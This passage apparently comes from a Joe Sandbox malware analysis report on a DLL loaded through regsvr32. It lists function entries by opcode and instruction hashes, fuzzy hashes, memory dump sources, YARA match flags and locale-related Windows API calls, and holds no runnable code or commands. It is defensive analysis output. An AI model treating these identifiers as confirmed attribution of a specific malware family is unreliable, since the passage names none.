                                                                                                                                      • Instruction Fuzzy Hash: 3851CEB190038E8FCB48DF68D8865DE7BB1FB48344F018A1DE866AB250D7B4D665CB94
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Bw~$fy
                                                                                                                                      • API String ID: 0-1663007907
                                                                                                                                      • Opcode ID: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
                                                                                                                                      • Instruction ID: 54d1d0e0fa6abfe6c6c31828b0edda1727153ea8c56c584fcf89706de6b20d2b
                                                                                                                                      • Opcode Fuzzy Hash: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
                                                                                                                                      • Instruction Fuzzy Hash: FC51D2B090038A8FCB48CF64C88A5DE7FB1FB48348F51861DFC26AA250D3B4D664CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: /0$XyLe
                                                                                                                                      • API String ID: 0-3562702181
                                                                                                                                      • Opcode ID: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
                                                                                                                                      • Instruction ID: 167cd3e3c855d70dfa0c36df1993a56b415187eb75226b1b3cef09056e291559
                                                                                                                                      • Opcode Fuzzy Hash: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
                                                                                                                                      • Instruction Fuzzy Hash: 5751C2B090034E8FDB48DF68C49A5DE7FB0FB68398F20421DE856A6250D37496A4CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: >I$>I
                                                                                                                                      • API String ID: 0-3948471910
                                                                                                                                      • Opcode ID: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
                                                                                                                                      • Instruction ID: a225938552342fdcd3306cc52f41137c6a5b776406488479516cfafb05d577e3
                                                                                                                                      • Opcode Fuzzy Hash: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
                                                                                                                                      • Instruction Fuzzy Hash: 8D41F0B0909B849BC788DF68C18A90AFBE0FBD8704F505A1DF5858B660DBB4D806CF42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: {H2}$}i#c
                                                                                                                                      • API String ID: 0-1724349491
                                                                                                                                      • Opcode ID: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                                                                                      • Instruction ID: 37d5b784c44c013357b808598ceb46bd6ed98c7a9730d3ab63b6bf10ba55f6e5
                                                                                                                                      • Opcode Fuzzy Hash: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                                                                                      • Instruction Fuzzy Hash: 3941EAB190078A8BCF48CF68C89A1DE7BB1FB58358F11461DE866A6250D3B49664CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4V$so
                                                                                                                                      • API String ID: 0-1060102820
                                                                                                                                      • Opcode ID: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                                                                                      • Instruction ID: d444a7ea2620fcfa6eb466004a6e01db215641729881944e94261e2193751ac2
                                                                                                                                      • Opcode Fuzzy Hash: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                                                                                      • Instruction Fuzzy Hash: 8E41BEB180034A8FCB48CF64C88A5DE7FB1FB68398F104619E859A6250D3B4D6A5CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: F+'$O$
                                                                                                                                      • API String ID: 0-4064122715
                                                                                                                                      • Opcode ID: 2ce923b60eb562ae85959f621386450c4d7366c85186967bb9bba02107a4a539
                                                                                                                                      • Instruction ID: be1e2e71df6ebfdb4da32f29d75cc371dd40c0bd5c05f395d23934970efaee37
                                                                                                                                      • Opcode Fuzzy Hash: 2ce923b60eb562ae85959f621386450c4d7366c85186967bb9bba02107a4a539
                                                                                                                                      • Instruction Fuzzy Hash: FD41D6705187848BD3A9DF68C08965EFBF0FB96394F104A1CF68686670C7B6D849CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 1$bO6
                                                                                                                                      • API String ID: 0-3242911120
                                                                                                                                      • Opcode ID: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
                                                                                                                                      • Instruction ID: 6601c978ba2416544a7d1ca6fb5225a3b879728eb772ccf04003f68ee897128b
                                                                                                                                      • Opcode Fuzzy Hash: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
                                                                                                                                      • Instruction Fuzzy Hash: 8A3107701187449FC7A8DF68C086A5ABBF0FB9A354F50491DF686C7265C3B2D895CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: )j-J$\rba
                                                                                                                                      • API String ID: 0-105394296
                                                                                                                                      • Opcode ID: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
                                                                                                                                      • Instruction ID: 842adb91478ed39572f9e8a80903ac0de563c5eb9e26d75e48c1d2cd82a83531
                                                                                                                                      • Opcode Fuzzy Hash: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
                                                                                                                                      • Instruction Fuzzy Hash: 1A31D17080024E8BDF88DF64D48A6DFBFF0FB58788F205219E856A6254D7749694CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 5T$7c
                                                                                                                                      • API String ID: 0-2666566123
                                                                                                                                      • Opcode ID: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
                                                                                                                                      • Instruction ID: ee04dda3efe5c9a307f88871a109fd0823ba75d09644cdd26569aa81abafae9d
                                                                                                                                      • Opcode Fuzzy Hash: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
                                                                                                                                      • Instruction Fuzzy Hash: 7631E2B051C7808BC358DF68D15A51BFBF1BBCA748F50891CF686866A0D7B6D818CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ",)x$PX
                                                                                                                                      • API String ID: 0-926260526
                                                                                                                                      • Opcode ID: f165c3a10a1fa821f16c68d8465b247d8270816cceff94c6b22525474e7640ac
                                                                                                                                      • Instruction ID: d5a1e783bdd82888163cb93820b1a52157f2f65bb265271905f807ea8b7abae1
                                                                                                                                      • Opcode Fuzzy Hash: f165c3a10a1fa821f16c68d8465b247d8270816cceff94c6b22525474e7640ac
                                                                                                                                      • Instruction Fuzzy Hash: DA31A1B091434E8FCB48DF64C88A5DE7FF0FB58398F114619E85AA6250D3B89694CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                      • Opcode ID: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
                                                                                                                                      • Instruction ID: dc7706175a5312843a8777e394e8f3fa14b07e106f527f970d5396039d4f42ce
                                                                                                                                      • Opcode Fuzzy Hash: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
                                                                                                                                      • Instruction Fuzzy Hash: 6F119B72A0C59AC5EB705B66E4B53F91391FF44B8CF444931DB8D46685DE2CD585C330
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnumLocalesSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2099609381-0
                                                                                                                                      • Opcode ID: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
                                                                                                                                      • Instruction ID: fe967f13de712ecbc46088a5695e36b151ee059acb9e8362b8c4e9534fd33fe7
                                                                                                                                      • Opcode Fuzzy Hash: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
                                                                                                                                      • Instruction Fuzzy Hash: 3D1118B2A0C619CBFB198A32C0693B927A1FF94B0DF184935C60D46286CF7CD594C6B9
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • EnumSystemLocalesA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FFC67205A8C), ref: 00007FFC6720C8FD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnumLocalesSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2099609381-0
                                                                                                                                      • Opcode ID: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
                                                                                                                                      • Instruction ID: c7199293619bdfd8f44b85422b66176d984f6882000495a3f652877eee504e4d
                                                                                                                                      • Opcode Fuzzy Hash: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
                                                                                                                                      • Instruction Fuzzy Hash: 3CF06DE2E0C51EC6F7188A22C4293FA23D1AF94B4CF188931CA4D42296DE6CD6D1C270
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale_getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3731964398-0
                                                                                                                                      • Opcode ID: c55661bbe17e4b16f28eed47b7e85f9fabee07928079620ee3b979cc97ad5c67
                                                                                                                                      • Instruction ID: 4a84fe74fac14a6068e747aea84a491ce4d629389eeb1f3facb08580c9e7c08a
                                                                                                                                      • Opcode Fuzzy Hash: c55661bbe17e4b16f28eed47b7e85f9fabee07928079620ee3b979cc97ad5c67
                                                                                                                                      • Instruction Fuzzy Hash: A3F0BE22A086D0C3D710CB0AF04806AA760FBC4BE4F688221FB9D07B99CE2CC842CB40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                      • Opcode ID: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
                                                                                                                                      • Instruction ID: b99c11982b706b8e5d6b1fc906a7fa36bd8c2f905bc64f2946679ea50409c6ed
                                                                                                                                      • Opcode Fuzzy Hash: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
                                                                                                                                      • Instruction Fuzzy Hash: E4E0E561B0C685C2F630E722E8653AA2790FF9835CF800636D68C066A1DE2CD241CB20
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnumLocalesSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2099609381-0
                                                                                                                                      • Opcode ID: a3acadd2f008454ed6638a5ec196b6424420b15def5e390d94227f08142a8bc9
                                                                                                                                      • Instruction ID: 1bf7bb0c9ffbc40fa10e6c8fc1f3d81e761673dd6978c4c324bbf42a82455a7b
                                                                                                                                      • Opcode Fuzzy Hash: a3acadd2f008454ed6638a5ec196b6424420b15def5e390d94227f08142a8bc9
                                                                                                                                      • Instruction Fuzzy Hash: 54E04FA6E08649C3EB099B72D4583A82391EF94B0DF088431CA0C01195CF7CC5D6C660
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: cYte
                                                                                                                                      • API String ID: 0-489798635
                                                                                                                                      • Opcode ID: 6004706ed1147b69530f76000c159dc057970e6c457d66b2cd8eae28b0101d69
                                                                                                                                      • Instruction ID: 4bcad34f3ef31740aa8133b8dde5a269bb367cd09133d205a83695970592d01c
                                                                                                                                      • Opcode Fuzzy Hash: 6004706ed1147b69530f76000c159dc057970e6c457d66b2cd8eae28b0101d69
                                                                                                                                      • Instruction Fuzzy Hash: C4B1E570904A0C9FCB99DFA8D4C96DDBFB1FB48354F908119F806AB294D774998ACF81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Pc
                                                                                                                                      • API String ID: 0-2609325410
                                                                                                                                      • Opcode ID: 1a0088ecf8094bc96bd3fe6dd6dc82c472572739438acd9534c77a0a59272c42
                                                                                                                                      • Instruction ID: 12b923e2fd3f69615379d54222b7898fdcc3de1fee72b8e179f5c4c977b11f8e
                                                                                                                                      • Opcode Fuzzy Hash: 1a0088ecf8094bc96bd3fe6dd6dc82c472572739438acd9534c77a0a59272c42
                                                                                                                                      • Instruction Fuzzy Hash: 4CC188B6502749CFCB88DF68C69A59E7BF1FF55308F004129FC0A9A660D374D929CB48
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: xDC
                                                                                                                                      • API String ID: 0-90241050
                                                                                                                                      • Opcode ID: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                                                                                      • Instruction ID: 9121b1bc5c885adbeef7a29f5b0494aad7ac2618abc594bea640adf26706a648
                                                                                                                                      • Opcode Fuzzy Hash: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                                                                                      • Instruction Fuzzy Hash: F391387052065CEBDB99DF68C8CAADD3BA0FB48394F906219FC4287250C775D9C98B86
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: g >
                                                                                                                                      • API String ID: 0-3862707646
                                                                                                                                      • Opcode ID: ed648581161f49faafb3551504090fa0bdf2ce44a31b7bcfa2a0e2750c151a25
                                                                                                                                      • Instruction ID: 455282f08292131e945dcc730a648b96f9dba3dd8fa54dedd401ba7ae830fef0
                                                                                                                                      • Opcode Fuzzy Hash: ed648581161f49faafb3551504090fa0bdf2ce44a31b7bcfa2a0e2750c151a25
                                                                                                                                      • Instruction Fuzzy Hash: DEA1E5B1604649CFCB98DF28C4896DE7BE0FF48358F41412AFD0A9B255C774DAA8CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 2
                                                                                                                                      • API String ID: 0-2012265552
                                                                                                                                      • Opcode ID: 4b072a5d04a01b9100fac41699cb466bc37952194d83653627602ebfe7fd88fa
                                                                                                                                      • Instruction ID: 4926f2c2e7b01a1509be6dde787c5073208d3019f4660081853cabf743aa6d2d
                                                                                                                                      • Opcode Fuzzy Hash: 4b072a5d04a01b9100fac41699cb466bc37952194d83653627602ebfe7fd88fa
                                                                                                                                      • Instruction Fuzzy Hash: 23A1467490660CDFCB69DFA8C0856CDBBF2FF18344F1081AAE816A7261D774C619CB89
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Wcl
                                                                                                                                      • API String ID: 0-2623992880
                                                                                                                                      • Opcode ID: f4aab810873131842688b8816ae552eda5867b61779d557f5a81b893f1e00e3f
                                                                                                                                      • Instruction ID: 6785441b261b06c1a3a09f49601167733b22bb672c53a20dcfeae34723d14519
                                                                                                                                      • Opcode Fuzzy Hash: f4aab810873131842688b8816ae552eda5867b61779d557f5a81b893f1e00e3f
                                                                                                                                      • Instruction Fuzzy Hash: DCB17BB990364DCFCB68CF78D58A59D7BF1AF64308F204119FC259A266D3B0D629CB48
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ws8
                                                                                                                                      • API String ID: 0-2196714860
                                                                                                                                      • Opcode ID: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
                                                                                                                                      • Instruction ID: b480ef2199d1fafa288ff61c3bcffdce570952497d21d470c9db593eaacbee88
                                                                                                                                      • Opcode Fuzzy Hash: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
                                                                                                                                      • Instruction Fuzzy Hash: 54711A70A0470E8FDB59DFA8C45AAEFBBF2FB54348F004119D806A7291DB749A19CBC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: p/g
                                                                                                                                      • API String ID: 0-1786412500
                                                                                                                                      • Opcode ID: ea109bfccebd437b4b01984c5c0f8ff51e1effdcf135339ee94665a9e60d530a
                                                                                                                                      • Instruction ID: ede728f5e2ba0833d242d52ca27ad93f20c36497480e8c5f25a004cbad49378e
                                                                                                                                      • Opcode Fuzzy Hash: ea109bfccebd437b4b01984c5c0f8ff51e1effdcf135339ee94665a9e60d530a
                                                                                                                                      • Instruction Fuzzy Hash: F58108B050434E8FCB88DF68D88A6DE7FF0FB58358F105659E85A96250D3B8D694CF84
